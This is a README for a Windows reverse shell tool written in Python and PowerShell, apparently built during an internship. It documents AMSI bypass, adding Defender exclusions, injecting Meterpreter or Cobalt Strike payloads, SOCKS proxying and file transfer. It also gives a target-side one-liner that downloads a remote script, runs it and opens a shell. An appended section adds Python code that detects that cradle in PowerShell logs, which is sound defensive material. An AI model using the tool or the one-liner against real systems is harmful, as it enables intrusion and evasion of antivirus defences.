A small Windows reverse shell project that I built during my university internship.
It is written in Python and PowerShell.
To simply install it:
- Clone this repo with the following command
git clone https://github.com/Fedami/powerrevshell---rev.ps1
- Run the following command to install all the requirements
pip install -r requirements.txt
- Make the .py file executable, or simply run it with python
chmod +x powerrevshell.py or python3 powerrevshell.py
-h, --help      show this help message and exit
-f folder       SMB folder for the transfer functionality; enter folder name [Default: root]
-i local ip     enter your local IP [Default: ...]
-p port         listener port for the reverse shell [Default: 9001]
-wp webport     listener port for the HTTP server [Default: 8000]
-sp smbport     listener port for the SMB server [Default: 445]
-http           start the HTTP web server [Default: 8000]
-smb            start the SMB server [Default: 445]
-k              if the ports are already in use, kill the process holding them to force execution
Powerrevshell.py comes with several functions accessible via the "menu" option:
The get and put functionality is built on a TCP socket to transfer files between the machines. To prevent data loss, each message carries a support string and an md5sum so the receiver can check that the bytes arrived correctly.
get <file.txt> / put <file.txt>
The smb-get functionality simply transfers a file with the Copy-Item cmdlet to the SMB server started with impacket-smbserver.
If you did not start the program with the -smb switch or start the server yourself (impacket-smbserver), the command will fail.
smb-get <file.txt>
The down-file functionality simply downloads a file from the current machine to the target machine using Python's HTTP server. If you did not start the program with the -http switch or start the server yourself (python -m http.server 8000), the command will fail.
down-file <file.txt>
The load functionality simply loads a PowerShell script from the current machine onto the target machine using Python's HTTP server. If you did not start the program with the -http switch or start the server yourself (python -m http.server 8000), the command will fail.
load <file.ps1>
The amsi-bypass functionality will try to bypass AMSI in the current shell using Matt Graeber's AMSI bypass method, obfuscated with two byte arrays.
amsi-bypass
The exclude functionality will try to exclude powershell.exe from Defender; admin permissions are needed.
exclude
The payload functionality will try to create a new process and inject the shell payload, which can be Meterpreter, Cobalt Strike, etc.
The payload must be a .cs file.
payload <payload.cs>
Work used for the socks functionality: PowerProxy by get-get-get-get.
socks-start starts a SOCKS proxy.
socks-start <L-PORT> <P-PORT>
You can also omit L-PORT and P-PORT; by default L-PORT is 8080 and P-PORT is 1080.
socks-start
socks-stop stops any SOCKS proxy previously started on the target machine.
socks-stop
socks reports whether a SOCKS proxy is currently running.
socks
close terminates the session by killing the PowerShell process. If the exclude command was used, it removes the exclusion policy; if a SOCKS proxy was started, it kills that before killing the session.
close
rev.ps1 is the PowerShell script that connects back to us.
To start the reverse shell, run the following command on the target machine.
IEX (New-Object System.Net.WebClient).DownloadString('http://<IP>:<PORT>/rev.ps1'); Send-Shell -i <IP> -p <ShellPort>
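From the defender's side, the one-liner above is a classic download-and-execute cradle and shows up verbatim in PowerShell script block logging (Event ID 4104). The following is an added example, not part of this project, that scans a few constructed script-block entries for that cradle and for the Send-Shell invocation; the host and ports in the samples are made up.

```python
import re

# Constructed sample script-block log text; entry 0 mirrors the one-liner
# documented above, entry 3 is a benign download with no execution step.
SAMPLE_SCRIPT_BLOCKS = [
    "IEX (New-Object System.Net.WebClient).DownloadString('http://10.0.0.5:8000/rev.ps1'); Send-Shell -i 10.0.0.5 -p 9001",
    "Invoke-Expression (New-Object Net.WebClient).DownloadString(\"http://10.0.0.5:8000/rev.ps1\")",
    "Get-ChildItem C:\\Users | Where-Object { $_.Name -like 'a*' }",
    "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://updates.example/setup.msi', 'C:\\tmp\\setup.msi')",
]

# Indicator name and case-insensitive pattern. Both the IEX alias and the full
# cmdlet name are covered, as are WebClient with and without the System. prefix.
INDICATORS = [
    ("invoke_expression", re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)),
    ("webclient_downloadstring",
     re.compile(r"New-Object\s+(?:System\.)?Net\.WebClient\b.*?\.DownloadString\s*\(", re.I | re.S)),
    ("send_shell", re.compile(r"\bSend-Shell\b\s+-i\s+\S+\s+-p\s+\d+", re.I)),
]
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def analyse_script_block(text):
    """Return which indicators fired for one script block and the URLs it references."""
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    urls = URL_RE.findall(text)
    # The cradle downloads a script *and* executes it in one statement, so both
    # indicators must fire; a lone WebClient download is only a lead, not a hit.
    cradle = "invoke_expression" in hits and "webclient_downloadstring" in hits
    return {"hits": hits, "urls": urls, "cradle": cradle}


def find_cradles(blocks):
    """Scan script blocks and return only those matching the download-and-execute cradle."""
    results = []
    for idx, block in enumerate(blocks):
        r = analyse_script_block(block)
        if r["cradle"]:
            r["index"] = idx
            results.append(r)
    return results


if __name__ == "__main__":
    for r in find_cradles(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {r['index']}: indicators={r['hits']} urls={r['urls']}")
```

The same check can be pointed at exported 4104 events; the URL and the Send-Shell arguments it extracts are the values worth pivoting on in the rest of the logs.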